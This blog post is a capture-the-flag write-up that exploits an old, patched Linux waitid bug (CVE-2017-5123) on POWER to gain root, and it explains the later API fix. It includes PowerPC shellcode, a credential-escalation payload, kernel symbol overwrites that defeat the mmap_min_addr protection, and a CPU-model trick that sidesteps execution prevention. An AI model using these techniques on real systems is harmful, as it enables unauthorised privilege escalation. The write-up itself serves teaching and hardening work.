The other kind of kernel hacking
Instead of writing mitigations, memory protections and sanitisers all day, I figured it'd be fun to get the team to try playing for the other team. It's a fun set of skills to learn, and it's a very hands-on way to understand why kernel hardening is so important. To that end, I decided to concoct a simple kernel CTF and enforce some mandatory fun. Putting this together, I had a few rules:
- it should be exploiting a real world vulnerability
- it should be on Power (since that's what we do around here)
- it should be conceptually simple to understand (and not require knowledge of network stacks or sandboxes etc)
- it's more important to be educational than to be realistic
So I threw something together and I think it did a decent job of meeting those targets, so let's go through it!
Stage 1: the bug
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
}
if (!err) {
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user((short)info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
This is the implementation of the waitid
syscall in Linux v4.13, released in
September 2017. For our purposes it doesn't matter what the syscall is supposed
to do - there's a serious bug here that will let us do very naughty things. Try
and spot it yourself, though it may not be obvious unless you're familiar with
the kernel's user access routines.
#define put_user(x, ptr) \
({ \
__typeof__(*(ptr)) __user *_pu_addr = (ptr); \
\
access_ok(_pu_addr, sizeof(*(ptr))) ? \
__put_user(x, _pu_addr) : -EFAULT; \
})
This is put_user()
from arch/powerpc/include/asm/uaccess.h
. The
implementation goes deeper, but this tells us that the normal way the kernel
would write to user memory involves calling access_ok()
and only performing
the write if the access was indeed OK (meaning the address is in user memory,
not kernel memory). As the name may suggest, unsafe_put_user()
skips that
part, and for good reason - sometimes you want to do multiple user accesses at
once. With SMAP/PAN/KUAP etc enabled, every put_user()
will enable user
access, perform its operation then disable it again, which is very inefficient.
Instead, patterns like in waitid
above are rather common - enable user access,
perform a bunch of "unsafe" operations and then disable user access again.
The bug in waitid
is that access_ok()
is never called, and thus there is no
validation that the user provided pointer *infop
is pointing to user memory
instead of kernel memory. Calling waitid
and pointing into kernel memory
allows unprivileged users to write into whatever they're pointing at. Neat!
This is CVE-2017-5123,
summarised as "Insufficient data validation in waitid allowed an user to escape
sandboxes on Linux". It's a primitive that can be used for more than that, but
that's what its discoverer used it for, escaping the Chrome
sandbox.
If you're curious, there's a handful of different writeups exploiting this bug for different things that you can search for. I suppose I'm now joining them!
A tangent: API design
Failing to enforce that a user-provided address to write to is actually in userspace is a hefty mistake, one that wasn't caught until after the code made it all the way to a tagged release (though the only distro release I could find with it was Ubuntu 17.10-beta2). Linux is big, complicated, fast-moving, and all that - there's always going to be bugs. It's not possible to prevent the entire developer base from ever making mistakes, but you can design better APIs so mistakes like this are much less likely to happen.
Let's have a look at the waitid
syscall implementation as it is in upstream
Linux at the time of writing.
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
if (!user_write_access_begin(infop, sizeof(*infop)))
return -EFAULT;
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_write_access_end();
return err;
Efault:
user_write_access_end();
return -EFAULT;
}
Notice any differences? Not a lot has changed, but instead of an unconditional
user_access_begin()
, there's now a call to user_write_access_begin()
. Not
only have the user access functions been split into read and write (though
whether there's actually read/write granularity under the hood depends on the
MMU-specific implementation), but the _begin()
function takes a pointer and
the size of the write. And what do you think that's doing...
static __must_check inline bool
user_write_access_begin(const void __user *ptr, size_t len)
{
if (unlikely(!access_ok(ptr, len)))
return false;
might_fault();
allow_write_to_user((void __user *)ptr, len);
return true;
}
That's right! The missing access_ok()
check from v4.13 is now part of the API
for enabling user access, so you can't forget it (without trying really hard).
If there's something else you should be doing every time you call a function
(i.e. access_ok()
when calling user_access_begin()
), it should probably just
be part of the function, especially if there's a security implication.
This bug was fixed by adding in the missing access_ok()
check, but it's very
cool to see that bugs like this are now much less likely to get written.
Stage 2: the primitive
Before we do anything too interesting, we should figure out what we actually
have here. We point our pointer at 0xc000000012345678
(an arbitrary kernel
address) then take a look in gdb, revealing the following:
pwndbg> x/10 0xc000000012345678
0xc000000012345678: 17 0 1 0
0xc000000012345688: 2141 1001 1 0
So we know that we can at least set something to zero, and there's some
potential for more mischief. We could fork()
a lot to change the value of the
PID to make our write a bit more arbitrary, but to not get too fancy I figured
we should just see where we could get by setting something either to zero or to
something non-zero.
A few targets came to mind. We could spray around where we think creds are
located to try and overwrite the effective user ID of a process to 0, making it
run as root. We could go after something like SELinux, aiming for flags like
selinux_enabled
and selinux_enforcing
. I'm sure there's other sandbox-type
controls we could try and escape from, too.
None of these were taking my CTF in the direction I wanted it to go (which was
shellcode running in the kernel), so I decided to turn the realism down a notch
and aim for exploiting a null pointer dereference. We'd map our shellcode to
*0
, induce a null pointer dereference in the kernel, and then our exploit
would work. Right?
So we're just going to go for a classic privilege escalation. We start as an unprivileged user and end up as root. Easy.
Stage 3: the target
I found an existing exploit doing
the same thing I wanted to do, so I just stole the target from that. It has
some comments in French which don't really help me, but thankfully I found
another version with some additional comments - in Chinese. Oh well.
have_canfork_callback
is a symbol that marks whether cgroup subsystems have a
can_fork()
callback that is checked when a fork is attempted. If we overwrite
have_canfork_callback
to be non-zero when can_fork
is still NULL, then we
win! We can reliably reproduce a null pointer dereference as soon as we
fork()
.
I'm sure there's heaps of different symbols we could have hit, but this one has
some nice properties. Any non-zero write is enough, we can trigger the
dereference at a time in our control with fork()
, and to cover our bases we
can just set it back to 0 later.
In our case, we had debug info and a debugger, so finding where the symbol was
located in memory is pretty easy. There's also /proc/kallsyms
which is great
if it's enabled. Linux on Power doesn't yet support KASLR which also saves us a
headache or two here, and you can feel free to ask me why it's low on the
priority list.
So now we have a null pointer dereference. Now let's get that doing something!
Stage 4: preparing the exploit
Virtual memory is one heck of a drug. If the kernel is going to execute from
0x0
, we just need to mmap()
to 0! Easy.
Well, it's not that easy. Turning any null pointer dereference into an easy
attack vector is not ideal, so users aren't allowed to mmap to low address
ranges, in our case, below PAGE_SIZE
. Surely there's nothing in the kernel
that would try to dereference a pointer + PAGE_SIZE
? Maybe that's for a
future CTF...
There's a sysctl for this, so in the actual CTF we just did sysctl -w
vm.mmap_min_addr=0
and moved on for brevity. As I was writing this I decided
to make sure it was possible to bypass this without cheating by making use of
our kernel write primitive, and sure enough, it works! I had to zero out both
mmap_min_addr
and dac_mmap_min_addr
symbols, the latter seemingly required
for filesystem interactions to work post-exploit.
So now we can trigger a null pointer dereference in the kernel and we can
mmap()
our shellcode to 0x0, we should probably get some shellcode. We want
to escalate our privileges, and the easiest way to do that is the iconic
commit_creds(prepare_kernel_cred(0))
.
prepare_kernel_cred()
is intended to produce a credential for a kernel task.
Passing 0
/NULL
gets you the same credential that init runs with, which is
about as escalated as our privileges can get. commit_creds()
applies the
given credential to the currently running task - thus making our exploit run as
root.
As of somewhat recently it's a bit more complex than that, but we're still back in v4.13, so we just need a way to execute that from a triggered null pointer dereference.
Stage 5: the shellcode
The blessing and curse of Power being a niche architecture is that it's hard to find existing exploits for. Perhaps lacking in grace and finesse, but effective nonetheless, is the shellcode I wrote myself:
static const unsigned char shellcode[] = {
0x00, 0x00, 0xc0, 0x3b, // li r30, 0
0x20, 0x00, 0x9e, 0xe9, // ld r12,32(r30)
0x00, 0x00, 0xcc, 0xfb, // std r30,0(r12)
0x18, 0x00, 0x9e, 0xe9, // ld r12,24(r30)
0xa6, 0x03, 0x89, 0x7d, // mtctr r12
0x20, 0x04, 0x80, 0x4e, // bctr
};
After the CTF I encouraged everyone to try writing their own shellcode and noone did, and I will take that as a sign that mine is flawlessly designed.
First we throw 0 into r30
, which sounds like a register we'll get away with
clobbering. We load an offset of 32 bytes from the value of r30
into r12
(and r30
is 0, so this is the address 32). Then, we store the value of r30
(which is 0) into the address in r12
- writing zero to the address found at
*32
.
Then, we replace the contents of r12
with the value contained at address 24.
Then, we move that value into the count register, and branch to the count
register - redirecting execution to the address found at *24
.
I wrote it this way so participants would have to understand what the shellcode was trying to do to be able to get any use out of it. It expects two addresses to be placed immediately after it terminates and it's up to you to figure out what those addresses should be!
In our case, everyone figured out pretty quickly that *24 should point at our very classic privesc:
void get_root() {
if (commit_creds && prepare_kernel_cred)
commit_creds(prepare_kernel_cred(0));
}
Addresses for those kernel symbols need to be obtained first, but we're experts at that now. So we add in:
*(unsigned long *)24 = (unsigned long)get_root;
And that part's sorted. How good is C?
Noone guessed what address we were zeroing, though, and the answer is
have_canfork_callback
. Without mending that, the kernel will keep attempting
to execute from address 0, which we don't want. We only need it to do that
once!
So we wrap up with
*(unsigned long *)32 = have_canfork_callback;
and our shellcode's ready to go!
Stage 6: it doesn't work
We've had good progress so far - we needed a way to get the kernel to execute
from address 0 and we found a way to do that, and we needed to mmap
to 0 and
we found a way to do that. And yet, running the exploit doesn't work. How
come?
Unable to handle kernel paging request for instruction fetch
Faulting instruction address: 0x00000000
Oops: Kernel access of bad area, sig: 11 [#2]
The MMU has ended our fun. KUEP is enabled (SMEP on x86, PXN on ARM) so the MMU
is enforcing that the kernel can't execute from user addresses. I gave everyone
a bit of a trick question here - how can you get around this purely from the
qemu
command line?
The way I did it wasn't to parse nosmep
(and I'm not even sure that was
implemented for powerpc in v4.13 anyway), it was to change from -cpu POWER9
to
-cpu POWER8
. Userspace execution prevention wasn't implemented in the MMU
until POWER9, so reverting to an older processor was a cheeky way to get around
that.
Stage 7: victory!
Putting all of that together, we have a successful privilege escalation from attacking the kernel.
/ $ ./exploit
Overwriting mmap_min_addr...
Overwriting dac_mmap_min_addr...
Overwriting have_canfork_callback...
Successfully acquired root shell!
/ # whoami
root
It's wild to think that even an exploit this simple would have been possible in the "real world" back in 2017, so it really highlights the value of kernel hardening! It made for a good introduction to kernel exploitation for me and my team and wasn't too contrived for the sake of simplicity.
Whether you're a beginner or an expert at kernel exploitation (or somewhere vaguely in the middle like me), I hope you found this interesting. There's lots of great PoCs, writeups and papers out there to learn from and CTFs to try if you want to learn more!